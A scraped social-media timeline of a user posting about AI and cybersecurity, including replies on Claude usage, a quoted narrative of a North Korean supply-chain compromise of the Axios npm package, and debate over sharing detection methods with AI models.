Red

2.9K posts

Red

Red

@TheRedWall__

e/acc | Cyber Security x AI | Claude boyz for life

Inscrit le Eylül 2024
719 Abonnements297 Abonnés
Tweet épinglé
Red
Red@TheRedWall__·
For those who come after
English
0
0
3
397
Red
Red@TheRedWall__·
@gabriberton The difference is George Hotz cannot be deployed at scale
English
0
0
0
11
Gabriele Berton
Gabriele Berton@gabriberton·
Super interesting take from one of the greatest hackers He says Mythos is not as good as they claim, because zero-day vulnerabilities are not that hard to find for skilled hackers I'm far from the hacking world but sounds reasonable Any thought?
Gabriele Berton tweet media
English
374
191
3.5K
296.5K
wavy
wavy@evil_w4re·
@THESTREETVOICE3 Study reverse engineering, not "cybersecurity" which is a buzz word for nessus scans and DISA STIGs
English
2
0
0
546
THE|VOICE|OF|THE|STREET®
THE|VOICE|OF|THE|STREET®@THESTREETVOICE3·
You've been studying cybersecurity for 3 years and still feel like you know nothing. Someone else has been doing it for 1year and is already finding bugs in real systems. Is the gap talent, methodology, or something else?
English
18
3
173
9.5K
Red
Red@TheRedWall__·
@Nick_Davidov wtf are they even building 😭
English
2
0
2
5K
Nick Davidov
Nick Davidov@Nick_Davidov·
Apparently in February Meta started urging its engineers to use Claude Code and started ranking engineers by token spend. people at GCP started seeing billions of tokens per minute coming from Meta, which might now be as big as 1/4 of all token spend in Anthropic.
English
48
37
1.9K
344K
Red
Red@TheRedWall__·
@petergostev Honestly it’s about antitrust lmao
English
0
0
1
297
Peter Gostev
Peter Gostev@petergostev·
It's so curious to me, doesn't look like Google is serious about AI. They've been investing in Anthropic for years, selling them TPUs, and basically diverting resources from Gemini while it is cracking under capacity constraints. Imagine OpenAI selling capacity to their core competitor to make a quick buck on the side. I'd be pissed of I was a DeepMind exec.
Anthropic@AnthropicAI

We've signed an agreement with Google and Broadcom for multiple gigawatts of next-generation TPU capacity, coming online starting in 2027, to train and serve frontier Claude models.

English
112
6
667
186.8K
Red
Red@TheRedWall__·
@zeddotdev I would love obsidian style wiki links and even support for graph view Also front matter support is a must have
English
0
0
0
18
solst/ICE of Astarte
“The same threat cluster compromised Trivy (a security scanner), KICS, LiteLLM, and multiple GitHub Actions” Lmao they’re rebranding @pcpcats as NK intel agents hahahha
Aakash Gupta@aakashgupta

North Korean intelligence agents built an entire fake company to compromise one JavaScript developer. And it worked. UNC1069 didn't hack Axios. They befriended its maintainer. They cloned a real company founder's identity, built a branded Slack workspace with fake employee profiles and LinkedIn post channels, then scheduled a Microsoft Teams call with what appeared to be a full team. During the call, a fake error message said his system needed an update. He installed it. That update was the RAT. From one developer's laptop, they had everything: npm credentials, publishing access, the keys to a package installed in 80% of cloud environments. Axios gets 100 million downloads per week. The attackers published two poisoned versions at 12:21 AM UTC on a Sunday night, tagging both the latest and legacy branches within 39 minutes. The malicious dependency had been pre-staged 18 hours earlier with a clean decoy version to build registry history. Three separate RAT payloads were pre-built for macOS, Windows, and Linux. The malware self-deleted after execution to erase forensic evidence. The poisoned versions were live for about three hours before npm pulled them. Huntress observed 135 endpoints across all operating systems calling the attacker's command-and-control server during that window. Wiz found the malicious versions in roughly 3% of environments scanned. Every affected machine needs full credential rotation: npm tokens, AWS keys, SSH keys, CI/CD secrets, everything in .env files. The part that keeps getting worse: this isn't isolated. The same threat cluster compromised Trivy (a security scanner), KICS, LiteLLM, and multiple GitHub Actions in the two weeks before Axios. Google estimates hundreds of thousands of stolen secrets are now circulating from these combined attacks. The maintainer had 2FA enabled. He said himself: "I have 2FA/MFA on practically everything." The exact method of token compromise is still undetermined. One person. One fake Teams call. 100 million weekly downloads weaponized in under three hours. The npm ecosystem runs on mass trust in individual maintainers who volunteer their time, and North Korean intelligence now has a repeatable playbook for turning that trust into a delivery mechanism.

English
5
4
67
8.5K
Red
Red@TheRedWall__·
@dodo_sec @cyb3rops Any advantage from withholding information is short lived. AI is the future is the cyber security and I prefer helping to shape that future. If you believe making models better at defensive cyber work is anything other than good, your incentives for fundamentally misaligned
English
1
0
0
30
Florian Roth ⚡️
Florian Roth ⚡️@cyb3rops·
I’ve deliberately not published blog posts on useful detection ideas and rule-writing methods because I didn’t want LLMs to absorb them. So those ideas stayed private and were shared only with a small group. I doubt I’m the only one making that call. And that probably has consequences for the community over time - not just ours, but any community.
English
44
58
525
144.3K
Red
Red@TheRedWall__·
@vxunderground If the goal is positive impact on cyber security, there is no reason to not share. Holding back is a net negative to the community but personal incentives are taking precedence here.
English
0
0
2
145
vx-underground
vx-underground@vxunderground·
As someone who collects malware stuff, I strongly dislike this. I understand what Mr. Roth is trying to convey (I think), but something about this irritates me. I'm not sure what it is yet, this is irritating me somewhere emotionally and I don't understand why.
Florian Roth ⚡️@cyb3rops

I’ve deliberately not published blog posts on useful detection ideas and rule-writing methods because I didn’t want LLMs to absorb them. So those ideas stayed private and were shared only with a small group. I doubt I’m the only one making that call. And that probably has consequences for the community over time - not just ours, but any community.

English
46
22
584
60.1K
Jonathan Bar Or (JBO) 🇮🇱🇺🇸🇺🇦
I have created a CTF challenge that Claude (now running 10 hours straight with all the skills you can think of) simply cannot solve (but I assure you - it is solvable). That confirms my suspicions - LLMs would persistently run all the well-known tricks that have been known for years, but will not be able to utilize original ideas.
Jonathan Bar Or (JBO) 🇮🇱🇺🇸🇺🇦 tweet media
English
17
14
260
29K
Red
Red@TheRedWall__·
@IceSolst @ThePrimeagen Nahhh you can’t lump Dario into the same group at Garry lmao
English
0
0
1
17
ThePrimeagen
ThePrimeagen@ThePrimeagen·
Dario Translator> "bro, trust me bro, we have agi, its super smart, like way smarter than you or me, AGI is super human smart and dangerous, no human can save us, its absolutely the worst thing ever. therefore, i have some laws i think you should pass. I can save her bro"
Chief Nerd@TheChiefNerd

🚨 Anthropic CEO Dario Amodei: “We are so close to these models reaching the level of human intelligence, and yet there doesn't seem to be a wider recognition in society of what's about to happen … There hasn't been a public awareness of the risks.”

English
125
109
1.9K
89.2K
Red
Red@TheRedWall__·
@kevinakwok Please use thinking🙏
English
0
0
0
53
Red
Red@TheRedWall__·
@moyix @xlr8harder Curious your thoughts on the harnesses of xbow, wiz red agent, etc. being over engineered for future models In other words, will future models clear that 6-12 month gap simply with capability alone
English
1
0
4
476
Red
Red@TheRedWall__·
@RileyRalmuto Bro if you’re still using embeddings you’re ngmi
English
0
0
0
50
Riley Coyote
Riley Coyote@RileyRalmuto·
ok so i’m genuinely excited about this and surprised i haven’t seen more people talking about it yet. but i guess thats bc if you arent building agents, memory, etc, you have no need to understand or care about it. but...it literally will impact everyone. so. ill try to break it down a little bit. very short version: google just shipped a model that casually fixes one of the biggest bottlenecks in modern ai systems, especially around memory (which is why i care so much). the old way basically looked like this: – text went into one model – images into another – audio had to be transcribed first – video was hacked together from frames + transcripts – pdfs needed their own ocr/extraction pipeline then you’d try to jerry-rig all of that together, juggle multiple indexes, and hope the results felt coherent and actually worked, basically. when it worked, it was slow, brittle, and expensive to maintain, as far as i know and have experienced, at least. literally all of that is essentially solved with this new bad boy. text, images, short video, audio, pdfs - even mixed together - all get embedded into the same space in a single step. one call one vector one index hell freaking yeah. that probably still sounds like a less-than-big deal, but its actually v big: – you can search across any media with a simple text query – you don’t lose nuance from forced transcription/ocr bullshit – you maintain one clean pipeline instead of a frankenstein where it gets really interesting (for me) is memory. traditionally, “ai memory” has basically meant “a text database with a good search function.” this is basically why memory for ai companions has always felt dead. like no matter what you do it just doesnt quite get there. and while Mnemos has changed that quite a bit for me, this genuinely has the potential to 10x the experience overall. with this, every episode can be stored as a single, multimodal memory: a conversation + a screenshot + a voice note + a short screen recording all live together as one...unit? so when a system recalls something, it now recalls the entire moment rather than a makeshift recreation from text. i also learned that on top of that you have the ability to use smaller vectors for quick recall that can expand to full detail when needed, which means you get something that starts to look a lot more like true long-term, episodic memory for agents. and my memory already feels like true long term episodic memory. so i feel like this is going to *actually* change everything. gross, i hate cliches. whatver. i don’t think this is like, just another release. it *actually* removes a major layer of friction between the messy as hell, multimodal world we actually live in and the systems we’re trying to build. thats the claim, at least. obviously i’m especially excited to explore what this unlocks for my own memory system - but i think it’s going to end up touching almost everything people build over the next few years. i mean along with whatever other labs release something like it. if im wrong about that, feel free to let me know. but this wouldnt be the first time google casually ships something unbelievably important. yay. no sleep for me tonight.😁
Google AI Developers@googleaidevs

Start building with Gemini Embedding 2, our most capable and first fully multimodal embedding model built on the Gemini architecture. Now available in preview via the Gemini API and in Vertex AI.

English
19
18
356
43.6K
Red
Red@TheRedWall__·
@nbaschez Empathy :)
English
0
0
1
62
Malfors
Malfors@MalforsHQ·
Apple shipped ClickFix protection? We just noticed that we can't copy-paste text from the browser to the terminal if it contains a malicious hostname. Very vice!
Malfors tweet media
English
14
10
65
21.1K